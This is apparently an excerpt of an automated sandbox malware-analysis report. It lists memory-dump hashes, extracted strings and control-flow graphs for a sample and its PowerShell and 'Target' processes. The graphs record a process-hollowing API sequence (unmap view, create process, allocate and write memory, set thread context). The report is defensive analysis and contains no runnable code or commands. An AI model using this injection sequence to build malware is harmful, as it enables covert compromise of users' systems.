                                              • Instruction ID: 57d5bff77f0fa060a7c8e5c75d2f909cc5d423dfb0e2be9862798a8d691e4378
                                              • Opcode Fuzzy Hash: 98a72ac39a0998feb08f090e65c17f57a30b5a67e27c3d36c181c6b63d60a3b6
                                              • Instruction Fuzzy Hash: 0CB01230C5760A41C9283271094304031509B09104FD12674E80840256D46F81D58242
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1693415098.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b8b0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94756c1dda6baa313df08d64e37764cb276b4215dcf77a21eb8fe4f1dadb7e4e
                                              • Instruction ID: fc7a5d46d784a37a209c3912b72d48f7f944aeed52bd5698c62286ace8177e6e
                                              • Opcode Fuzzy Hash: 94756c1dda6baa313df08d64e37764cb276b4215dcf77a21eb8fe4f1dadb7e4e
                                              • Instruction Fuzzy Hash: 96E18E21A1E7DA0FE32E4B744C725B43BA1EF57205B1A46FEC9C787097D918A50787C2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1693415098.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b8b0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 923442d34b4fc6c5815775d710161c45ae7361e53450b491e72c867156f4e6c7
                                              • Instruction ID: 8b3047501a2d2dcf5b6963b0f095ac8f8714ad31eabde183bb82d1e65ac26071
                                              • Opcode Fuzzy Hash: 923442d34b4fc6c5815775d710161c45ae7361e53450b491e72c867156f4e6c7
                                              • Instruction Fuzzy Hash: 79C1C37150EB898FD752DB78C8297987FE0EF56320F4500EAD489CB1E6D7AC1806C752
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 499980c7d385c7bd1c371c4dacdcdb1dbb01f59d3b1ef5156b5be7c9fe871b57
                                              • Instruction ID: f6d6670df76952fef6788ba829c69abbaedb7e0800abc050761ad5f3dcf7e1c2
                                              • Opcode Fuzzy Hash: 499980c7d385c7bd1c371c4dacdcdb1dbb01f59d3b1ef5156b5be7c9fe871b57
                                              • Instruction Fuzzy Hash: 6DA1C792A0F7C10BEBA247A818281655FD5BB6776071D00FAD0D84B1FFA8986E07D357
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 25e29db012f6690f9f8afd59d3559bec57a40ac88616b24d94e384cd854de56a
                                              • Instruction ID: f4af81bd6285d63ea43d50f08563563b282115f95d69a29b5763b5a1dbf9764a
                                              • Opcode Fuzzy Hash: 25e29db012f6690f9f8afd59d3559bec57a40ac88616b24d94e384cd854de56a
                                              • Instruction Fuzzy Hash: 7A812BA3B1E5264AE71977BCB95A5E83390DF41338B0912BBD05DCF0E3DD9C6047A684
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ab182585b104f334633e2875d2bfa27d54c5b5bd6e43e4d14559f62da665ce4
                                              • Instruction ID: 952c77e3cc9d57b286c2d79e6b602ffadd430f89eb114e4aee3598066ff1480c
                                              • Opcode Fuzzy Hash: 6ab182585b104f334633e2875d2bfa27d54c5b5bd6e43e4d14559f62da665ce4
                                              • Instruction Fuzzy Hash: 65713371A0E78D0FEF55DBA898156E9BFF1FF55300F0440BBD088C71A3EA64A9458781
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 73a28d82bc2d4a3d82c4b1dba690cf2a5db38b29428af32fbb1383306529b1d0
                                              • Instruction ID: e873a5aadc363488a38b8ca72a62b150c4f9dfb6a5ec2a77d59c87d198056974
                                              • Opcode Fuzzy Hash: 73a28d82bc2d4a3d82c4b1dba690cf2a5db38b29428af32fbb1383306529b1d0
                                              • Instruction Fuzzy Hash: 8671DBC3A0F7C61AE76A57F828350E52F91AF537A471E40F7D0D84B0F77889A90B9281
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 85102af304d46845c1c0a7ff90e8bc1819ce92037c83aef7d2ef5abd4688cf17
                                              • Instruction ID: 37a7e8b397315967a607c8ca2f4ecfd6a9fe8ab68ce5db7aea586f365f614d2f
                                              • Opcode Fuzzy Hash: 85102af304d46845c1c0a7ff90e8bc1819ce92037c83aef7d2ef5abd4688cf17
                                              • Instruction Fuzzy Hash: C3513862B0FAC50FEBB587AC68B51657B51EF5129070A01FBD0D84B0F7E999BE06C384
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7e006d14a80c1b89175bda2c7a252c98cb82dcf2aa4b0d24c8d658cd42972d74
                                              • Instruction ID: 4e30666002d387f5e84f7703f478ae7bc46055f872706dcb7d2e97da2cc2bb45
                                              • Opcode Fuzzy Hash: 7e006d14a80c1b89175bda2c7a252c98cb82dcf2aa4b0d24c8d658cd42972d74
                                              • Instruction Fuzzy Hash: 24411DB3B0FAD10FFBA187D858641566761BF912E071A01F7D4D4472BBE999FE098380
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1693415098.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b8b0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: >L_^$L_^z$L_^|$L_^|
                                              • API String ID: 0-901091740
                                              • Opcode ID: 6c58516b73929112f2a317840b0c5ec6401f3e1c96073d681f6320698a2b8f32
                                              • Instruction ID: 3748020801de3477eb6a22ca6f7cb6b20c4d4db29f7af324e01a8b08242637cb
                                              • Opcode Fuzzy Hash: 6c58516b73929112f2a317840b0c5ec6401f3e1c96073d681f6320698a2b8f32
                                              • Instruction Fuzzy Hash: 4831D65BB1993A42D22A32FEBD6A4FD2700CFC17BAB044573D26CC90E76C48604A49E6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1807741659.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f680244d7bba21563cddb1653e7dedf48fba290f3b5caec1f3659a667e88b72
                                              • Instruction ID: de1c8e9b075493d84cfc364b00767c7b365168e2d28db46a132161f4d665ca91
                                              • Opcode Fuzzy Hash: 5f680244d7bba21563cddb1653e7dedf48fba290f3b5caec1f3659a667e88b72
                                              • Instruction Fuzzy Hash: 00D14732A1FB8EAFEB659B6848654B57BA1EF52310B0901FFD05CCB0E3DA18A905C351
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1807187123.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 283f55cbb956ecf8113b0c6a66a095c82f9f89bc6c2097a2c99b0f1d20bdf1dd
                                              • Instruction ID: b818032404d12e0a5d1f0ebc111aa91b15b5559e5cf6624f98e529058a7c3083
                                              • Opcode Fuzzy Hash: 283f55cbb956ecf8113b0c6a66a095c82f9f89bc6c2097a2c99b0f1d20bdf1dd
                                              • Instruction Fuzzy Hash: 6A514832A0DA8D4FEB198B5C9C1A5E97FE0FF55310F04427FD49993292DA21B902CBC2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1806548020.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffd9b77d000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 82d12fc94f2a99a8272a795a0982aacdb2a3573a883ceb5e82e75acb466a7db1
                                              • Instruction ID: d9fb47aa5c1d3e98e2df098c34bdc034bacd99f98e15cf0a87fc610971d8cfd7
                                              • Opcode Fuzzy Hash: 82d12fc94f2a99a8272a795a0982aacdb2a3573a883ceb5e82e75acb466a7db1
                                              • Instruction Fuzzy Hash: BC41297150EBC84FE7568B2898959623FF4EF52314B1606EFE088CB1B3D625F846C792
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1807187123.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 416c67f25689502c9f19f6c19fd8db6a11f157427b45eeb7c0280c56ce798990
                                              • Instruction ID: 2a124e2a2dcb3e8b53bee96fef900ed6c78e611b0abde01081d20ce91cd2ce00
                                              • Opcode Fuzzy Hash: 416c67f25689502c9f19f6c19fd8db6a11f157427b45eeb7c0280c56ce798990
                                              • Instruction Fuzzy Hash: A821F83090C78C8FDB59DBAC984A7E97FF0EB56321F04416FD448C3166DA749856CB92
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1807187123.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                              • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                              • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1807741659.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 53a3b3eacdc12be3296e42826da989b2ae9999654d569a005520f56acb3de775
                                              • Instruction ID: 0153b8ae3c733dac817b20e708955a98b3bf3a38e40fc400b4a512ea3367eda4
                                              • Opcode Fuzzy Hash: 53a3b3eacdc12be3296e42826da989b2ae9999654d569a005520f56acb3de775
                                              • Instruction Fuzzy Hash: 9EF0BE32B0E5098FD769EB9CE4529E873E0EF6532071600BAE06DC72B3CA25EC41C741
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1807741659.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3da7805f81c2f4cad7e52394691d3cdd9c25c011376893865b7ddcdf4f667c89
                                              • Instruction ID: 48c4336c3fb733f7cd47708e9aef9535a38e41c4978b7d44c4019ea643c3adf0
                                              • Opcode Fuzzy Hash: 3da7805f81c2f4cad7e52394691d3cdd9c25c011376893865b7ddcdf4f667c89
                                              • Instruction Fuzzy Hash: CAF0BE32B0E5498FD769EB9CE0629E873E0FF0532070600BAE05DCB1A3CA26AC40C750
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1807741659.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                              • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                              • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1807187123.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c840c991501e7be4669e7a91bf308631d9dfef5bc329dba03eb946d8fe00010
                                              • Instruction ID: 8c9cddaed84f325c485bcda86a76cabf544e5b67ade7e48303af95b0bf5ab05c
                                              • Opcode Fuzzy Hash: 1c840c991501e7be4669e7a91bf308631d9dfef5bc329dba03eb946d8fe00010
                                              • Instruction Fuzzy Hash: 53E01234804A8C8F8B48EF18C8598E97BA0FF68201B01429BE81DC7520DB719A58CBC2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1807187123.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                              • API String ID: 0-2396788759
                                              • Opcode ID: bc54588a68202289f8d5c894d3c40993892077e8a2873f49884327916c3688f4
                                              • Instruction ID: 2f053609f881c5243871e9ebda0135a4c7dfd6c09fd645ac03a4238aab8b7e01
                                              • Opcode Fuzzy Hash: bc54588a68202289f8d5c894d3c40993892077e8a2873f49884327916c3688f4
                                              • Instruction Fuzzy Hash: 973191A3F0FACB5BEA6A066948790946FD0FF66BD471A43F3C0D48A4E3BD146D434142

                                              Execution Graph

                                              Execution Coverage:9.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:16.7%
                                              Total number of Nodes:18
                                              Total number of Limit Nodes:0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 56 7ffd9ba2407d-7ffd9ba2412c NtUnmapViewOfSection 60 7ffd9ba2412e 56->60 61 7ffd9ba24134-7ffd9ba2415a 56->61 60->61
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1749611770.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9ba20000_Target.jbxd
                                              Similarity
                                              • API ID: SectionUnmapView
                                              • String ID:
                                              • API String ID: 498011366-0
                                              • Opcode ID: 9f42861eade7df3600051c1cf2372be91fca162f4777c90494d4fc19c19ea77f
                                              • Instruction ID: de45adca48598260f43350368ff409c456e06ee07670088cc5ff5808526bab43
                                              • Opcode Fuzzy Hash: 9f42861eade7df3600051c1cf2372be91fca162f4777c90494d4fc19c19ea77f
                                              • Instruction Fuzzy Hash: 9431A731A0CB584FDB2DDB6898566FA7BF0EF55321F04416FE08AC3193DA64A546CB81

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1749611770.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9ba20000_Target.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 8b0605af5e88258acaaccec2e78949fb2ffcff83314b1300059fee0713982207
                                              • Instruction ID: 5953145f7bffb870d09c90a056bd15aacf942b9673aed14e838b2ecb9ca2beb9
                                              • Opcode Fuzzy Hash: 8b0605af5e88258acaaccec2e78949fb2ffcff83314b1300059fee0713982207
                                              • Instruction Fuzzy Hash: 5AB18030A18A8D8FEB68DF58C8567E977D1FB58300F15422EDC4EC7295DF74A9818B82

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1749611770.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9ba20000_Target.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 72e2ba53354e4b909fe4e203462c571b4bb8ff1d124a612027a61bd0fc946a30
                                              • Instruction ID: 670fc0ff2a1a674e26c8c3e56f830a6f867b3c4274c5213922cf6b50d0d84bd7
                                              • Opcode Fuzzy Hash: 72e2ba53354e4b909fe4e203462c571b4bb8ff1d124a612027a61bd0fc946a30
                                              • Instruction Fuzzy Hash: 3F31D131A0CB5C4FDB18DB58A8066E9BBE0FF59320F04426FE449D3292DB74A8458BC1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 49 7ffd9ba23d89-7ffd9ba23e4b VirtualAllocEx 53 7ffd9ba23e4d 49->53 54 7ffd9ba23e53-7ffd9ba23e79 49->54 53->54
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1749611770.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9ba20000_Target.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 443a5ce96d26a9f037fbf58157903c503bd8e11edb6b97f417e39663a8d2af97
                                              • Instruction ID: f766e2130b17ed277a2d3bb19828e431448cb6057cebc977dbd38aef45eac5a1
                                              • Opcode Fuzzy Hash: 443a5ce96d26a9f037fbf58157903c503bd8e11edb6b97f417e39663a8d2af97
                                              • Instruction Fuzzy Hash: C531D631A0CB4C4FDB1C9B589816AFD7BE0EF55320F10426FE45AC3292DB74A8168BC6

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 63 7ffd9ba23c19-7ffd9ba23cbc SetThreadContext 67 7ffd9ba23cbe 63->67 68 7ffd9ba23cc4-7ffd9ba23cf3 63->68 67->68
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1749611770.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9ba20000_Target.jbxd
                                              Similarity
                                              • API ID: ContextThread
                                              • String ID:
                                              • API String ID: 1591575202-0
                                              • Opcode ID: c0aff38aaf29d61ee5c88720eb2fcb9e4ec3cb2363c449ddda02d44061d22b80
                                              • Instruction ID: 1c10b6529da0ae8cf081b421300b9f6d3dd1588f8eae854880f90de916d5d591
                                              • Opcode Fuzzy Hash: c0aff38aaf29d61ee5c88720eb2fcb9e4ec3cb2363c449ddda02d44061d22b80
                                              • Instruction Fuzzy Hash: BC31D93190CB484FDB2DAB68985A6F97BF0EF55321F04417FD08AC3193DA75A946CB41

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0G
                                              • API String ID: 0-2227637342
                                              • Opcode ID: 92d2256c3311f8785d07aef631338d0e41b0ed132bbddef924823790b86e471b
                                              • Instruction ID: bb42fbd770a1f8dde371d3894db95d8cb0e5c489f940d0d06cc073c2e30860fd
                                              • Opcode Fuzzy Hash: 92d2256c3311f8785d07aef631338d0e41b0ed132bbddef924823790b86e471b
                                              • Instruction Fuzzy Hash: 8351C060B1E90D4FE7A8FBAC84716B876D2EF9D740B560179E10EC32E6DE287D018351

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 127 7ffd9ba2398d-7ffd9ba23999 128 7ffd9ba239a4-7ffd9ba239b3 127->128 129 7ffd9ba2399b-7ffd9ba239a3 127->129 130 7ffd9ba239be-7ffd9ba23a54 CloseHandle 128->130 131 7ffd9ba239b5-7ffd9ba239bd 128->131 129->128 135 7ffd9ba23a56 130->135 136 7ffd9ba23a5c-7ffd9ba23a81 130->136 131->130 135->136
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1749611770.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9ba20000_Target.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: ffe15df898e09a9b2c73103f54745cf541e1eed228a6489011639e3f79ff14de
                                              • Instruction ID: ad43a5ba52a87431d4a085b3bb9e854ea82f4b59fb2025c44ef57cb83fa60fbd
                                              • Opcode Fuzzy Hash: ffe15df898e09a9b2c73103f54745cf541e1eed228a6489011639e3f79ff14de
                                              • Instruction Fuzzy Hash: 6531143090D7888FDB1ADBA888566E9BFE0EF57320F0442ABD049C71A7DA785406C752

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 148 7ffd9b8a1643-7ffd9b8a165d call 7ffd9b8a0198 152 7ffd9b8a1668-7ffd9b8a1698 148->152
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1745725053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b8a0000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0G
                                              • API String ID: 0-2227637342
                                              • Opcode ID: 1c864771276029eb75bba5fe0877714eb948c9605b1cc1564d6c89d8df87b6f6
                                              • Instruction ID: 6862db9f29a1ec87c1b3c3d66cbf979024e8a9ddd4ea8dd557342ac82421d5f9
                                              • Opcode Fuzzy Hash: 1c864771276029eb75bba5fe0877714eb948c9605b1cc1564d6c89d8df87b6f6
                                              • Instruction Fuzzy Hash: 18F09E5271D9890FD35DAB6C54259B816D1EFEA39030902FAE00EC72D2EF1428414360
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1747862162.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd9b980000_Target.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ea25d997afb680ae7bc7fb2a4bebb48b0442478cd3b4e9257bcb275eecd932f
                                              • Instruction ID: 9ce54023b40fcb4a15223c260cc308bcf73f736f31368ed95f38145506ce96f9
                                              • Opcode Fuzzy Hash: 4ea25d997afb680ae7bc7fb2a4bebb48b0442478cd3b4e9257bcb275eecd932f
                                              • Instruction Fuzzy Hash: FC32C012B2AE5E1BE7F9976C087527553C3EFDC655B5A42BAC04EC32F6ED28ED024201

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 502 7ffd9b981766-7ffd9b98176b 503 7ffd9b9817ad-7ffd9b9817d8 502->503 504 7ffd9b98176d-7ffd9b981780 502->504 510 7ffd9b9817da-7ffd9b9817e7 503->510 511 7ffd9b9817f9 503->511 506 7ffd9b981782-7ffd9b9817a9 504->506 507 7ffd9b98171f-7ffd9b981737 504->507 506->503 518 7ffd9b981739-7ffd9b981745 507->518 519 7ffd9b981756-7ffd9b98175e 507->519 510->511 516 7ffd9b9817e9-7ffd9b9817f7 510->516 515 7ffd9b981c54-7ffd9b981c60 511->515 523 7ffd9b9817fe-7ffd9b981801 515->523 524 7ffd9b981c66-7ffd9b981c69 515->524 516->511 518->502 525 7ffd9b9818bb-7ffd9b9818be 523->525 526 7ffd9b981807-7ffd9b98180a 523->526 527 7ffd9b981c90-7ffd9b981c96 524->527 528 7ffd9b981c6b-7ffd9b981c89 524->528 532 7ffd9b9818c4-7ffd9b9818c7 525->532 533 7ffd9b9819bc-7ffd9b9819bf 525->533 534 7ffd9b981831-7ffd9b981844 526->534 535 7ffd9b98180c-7ffd9b98181f 526->535 530 7ffd9b981caf-7ffd9b981cba 527->530 531 7ffd9b981c98-7ffd9b981ca8 527->531 528->527 531->530 539 7ffd9b9818ee-7ffd9b981901 532->539 540 7ffd9b9818c9-7ffd9b9818e7 532->540 536 7ffd9b9819c1-7ffd9b9819c4 533->536 537 7ffd9b981a0e-7ffd9b981a11 533->537 550 7ffd9b98186e-7ffd9b98186f 534->550 551 7ffd9b981846-7ffd9b981866 534->551 557 7ffd9b981826-7ffd9b98182a 535->557 542 7ffd9b9819eb-7ffd9b9819f6 536->542 543 7ffd9b9819c6-7ffd9b9819e4 536->543 547 7ffd9b981a13-7ffd9b981a16 537->547 548 7ffd9b981a60-7ffd9b981a63 537->548 567 7ffd9b981903-7ffd9b981923 539->567 568 7ffd9b98192b-7ffd9b98192f 539->568 540->539 542->515 579 7ffd9b9819fc-7ffd9b981a09 542->579 543->542 554 7ffd9b981a3d-7ffd9b981a48 547->554 555 7ffd9b981a18-7ffd9b981a36 547->555 552 7ffd9b981aa9-7ffd9b981aac 548->552 553 7ffd9b981a65-7ffd9b981a68 548->553 561 7ffd9b981872-7ffd9b981873 550->561 551->550 559 7ffd9b981aae-7ffd9b981ab1 552->559 560 7ffd9b981afb-7ffd9b981afe 552->560 564 7ffd9b981a8f-7ffd9b981aa4 553->564 565 7ffd9b981a6a-7ffd9b981a88 553->565 554->515 583 7ffd9b981a4e-7ffd9b981a54 554->583 555->554 557->534 577 7ffd9b981ab3-7ffd9b981ad1 559->577 578 7ffd9b981ad8-7ffd9b981ae3 559->578 569 7ffd9b981b44-7ffd9b981b47 560->569 570 7ffd9b981b00-7ffd9b981b03 560->570 589 7ffd9b98187a-7ffd9b981894 561->589 564->515 565->564 567->568 574 7ffd9b981931-7ffd9b981932 568->574 575 7ffd9b98195a-7ffd9b98195b 568->575 584 7ffd9b981b8d-7ffd9b981b90 569->584 585 7ffd9b981b49-7ffd9b981b4c 569->585 581 7ffd9b981b2a-7ffd9b981b3f 570->581 582 7ffd9b981b05-7ffd9b981b23 570->582 587 7ffd9b981935-7ffd9b981936 574->587 597 7ffd9b981962-7ffd9b981971 575->597 577->578 578->515 610 7ffd9b981ae9-7ffd9b981af6 578->610 579->515 581->515 582->581 599 7ffd9b981a5b 583->599 594 7ffd9b981b92-7ffd9b981b95 584->594 595 7ffd9b981bdc-7ffd9b981bdf 584->595 592 7ffd9b981b73-7ffd9b981b74 585->592 593 7ffd9b981b4e-7ffd9b981b6c 585->593 605 7ffd9b98193d-7ffd9b981956 587->605 589->561 632 7ffd9b981896-7ffd9b981899 589->632 617 